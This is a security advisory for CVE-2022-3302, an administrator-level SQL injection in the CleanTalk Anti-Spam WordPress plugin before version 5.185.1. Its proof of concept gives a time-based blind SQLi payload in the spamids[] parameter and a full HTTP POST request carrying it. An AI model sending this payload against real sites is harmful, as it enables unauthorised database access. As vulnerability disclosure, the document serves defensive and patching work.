Anti-Spam by CleanTalk < 5.185.1 – Admin+ SQLi | CVE 2022-3302

Description

The plugin does not validate ids before using them in a SQL statement, which could lead to SQL injection exploitable by high privilege users such as admin

Proof of Concept

When deleting a scan logs (/edit-comments.php?page=ct_check_spam_logs), intercept the request and change the spamids[] parameter to 1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)

POST /wp-admin/edit-comments.php?page=ct_check_spam_logs HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://localhost
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=dd06127571&action=delete&spamids%5B%5D=1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)&action2=delete